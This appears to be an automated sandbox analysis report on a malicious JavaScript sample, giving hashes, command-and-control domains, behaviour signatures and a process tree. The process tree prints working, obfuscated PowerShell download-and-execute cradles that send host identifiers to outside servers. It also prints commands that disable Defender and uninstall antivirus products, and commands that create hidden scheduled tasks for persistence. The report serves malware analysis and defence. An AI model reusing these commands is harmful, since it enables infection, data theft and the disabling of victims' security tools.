Analysis
- max time kernel: 15s
- max time network: 89s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 13-01-2021 06:49

Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: readme.js, Resource: win7v20201028)
- Behavioral task: behavioral2 (Sample: readme.js, Resource: win10v20201028)
General
- Target: readme.js
- Size: 10KB
- MD5: db49b6f1f379122685be9553c5cc0f37
- SHA1: 45788a5c0c0d97d9bed9c0e6115eca1edbad8ba6
- SHA256: d8b5eaae03098bead91ff620656b9cfc569e5ac1befd0f55aee4cdb39e832b09
- SHA512: 1eae9f302d90b3a1887b9f74927bf9bfac0519ae0f4019497177eca3ac2086ed71b4296193bcf62ba493d7fe2e4d57f42ded79ed5e8789abca206a2185ebab23
Malware Config
- Extracted: http://t.zz3r0.com
- Extracted: http://t.zer9g.com
- Extracted: http://t.bb3u9.com
Signatures
- Blocklisted process makes network request (1 IoC)
  Processes (flow, pid, process):
    flow 9, pid 4052, powershell.exe
- Creates scheduled task(s) (1 TTP, 4 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes (pid, process):
    pid 3972, schtasks.exe
    pid 3872, schtasks.exe
    pid 4528, schtasks.exe
    pid 4324, schtasks.exe
- Opens file in notepad (likely ransom note) (1 IoC)
  Processes (pid, process):
    pid 696, notepad.exe
- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes (pid, process):
    pid 4052, powershell.exe
    pid 4052, powershell.exe
    pid 4052, powershell.exe
    pid 2260, powershell.exe
    pid 2260, powershell.exe
    pid 2260, powershell.exe
- Suspicious use of AdjustPrivilegeToken (44 IoCs)
  Processes (description, pid, process), in the order reported:
    pid 4052, powershell.exe, Token: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (22 entries)
    pid 4052, powershell.exe, Token: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (the same sequence repeated, 21 entries)
    pid 2260, powershell.exe, Token: SeDebugPrivilege (1 entry)
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes (pid, process -> target pid, target process):
    PID 648 wscript.exe wrote to memory of 2848 cmd.exe
    PID 648 wscript.exe wrote to memory of 2848 cmd.exe
    PID 2848 cmd.exe wrote to memory of 696 notepad.exe
    PID 2848 cmd.exe wrote to memory of 696 notepad.exe
    PID 2848 cmd.exe wrote to memory of 4052 powershell.exe
    PID 2848 cmd.exe wrote to memory of 4052 powershell.exe
    PID 4052 powershell.exe wrote to memory of 2452 cmd.exe
    PID 4052 powershell.exe wrote to memory of 2452 cmd.exe
    PID 4052 powershell.exe wrote to memory of 2260 powershell.exe
    PID 4052 powershell.exe wrote to memory of 2260 powershell.exe
Processes (process tree; indentation shows parent/child depth, each entry gives the image path, the command line, and the signatures triggered)
- C:\Windows\system32\wscript.exe
  Command: wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    Command: "C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\notepad.exe
      Command: notepad C:\Users\Admin\AppData\Local\Temp\readme.js
      Signatures: Opens file in notepad (likely ransom note)
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command: powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
      Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
        - C:\Windows\System32\Wbem\WMIC.exe
          Command: wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
        - C:\Windows\System32\Wbem\WMIC.exe
          Command: wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
        - C:\Windows\System32\Wbem\WMIC.exe
          Command: wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
        - C:\Windows\System32\Wbem\WMIC.exe
          Command: wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
        - C:\Windows\System32\Wbem\WMIC.exe
          Command: wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
        - C:\Windows\System32\Wbem\WMIC.exe
          Command: wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
        - C:\Windows\System32\Wbem\WMIC.exe
          Command: wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
      - C:\Windows\system32\cmd.exe
        Command: "C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
      - C:\Windows\system32\schtasks.exe
        Command: "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
        Signatures: Creates scheduled task(s)
      - C:\Windows\system32\schtasks.exe
        Command: "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \eDTR6r3P4nC /F /tr "powershell -w hidden -c PS_CMD"
        Signatures: Creates scheduled task(s)
      - C:\Windows\system32\schtasks.exe
        Command: "C:\Windows\system32\schtasks.exe" /run /tn \eDTR6r3P4nC
      - C:\Windows\system32\schtasks.exe
        Command: "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn LmHfWZxK4\4aSTNpL0 /F /tr "powershell -w hidden -c PS_CMD"
        Signatures: Creates scheduled task(s)
      - C:\Windows\system32\schtasks.exe
        Command: "C:\Windows\system32\schtasks.exe" /run /tn LmHfWZxK4\4aSTNpL0
      - C:\Windows\system32\schtasks.exe
        Command: "C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX /F /tr "powershell -w hidden -c PS_CMD"
        Signatures: Creates scheduled task(s)
      - C:\Windows\system32\schtasks.exe
        Command: "C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\FI1O5lZUNgL\C4tHFX
- C:\Windows\system32\msiexec.exe
  Command: C:\Windows\system32\msiexec.exe /V
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zer'+'9g.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.bb3'+'u9.com';a($url+'/a.jsp?mail_20210113?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
Downloads
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
  MD5: 8a313b70fd641fc4e6fffb40391d0b4d
  SHA1: 22684fe19ecd7943ac18e622db0d7f161db500e8
  SHA256: bd33eb064e32cf8d9af160e3304d3f0e1b90bdc9ab5116c16ba87d9a14060911
  SHA512: 5b72cd7e301ad3825bf1465840f52abb885c2481700df5dfa299c30aa6b61613dac8fc1386895cffec48b8229cba77085f672a80e42d7fd07c73eafd962e1246
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: b7ce5874fdff5e4fccdc0fbd21ae7971
  SHA1: 980d0d37b937620706eabba421e2e5b30a4b15f7
  SHA256: 1933f8e519dbd64305997d47fa8a68b2184a8a66ea1d187cc82d788e684fe4b9
  SHA512: 7e33fdf9cc1f1525b23fc960d2e8294d34272701100877a2a5b1028f32e7161e38d8e518bf41ddcca9a050755b05efa3cb86ba22c8e89e06555482a6ab04ee3b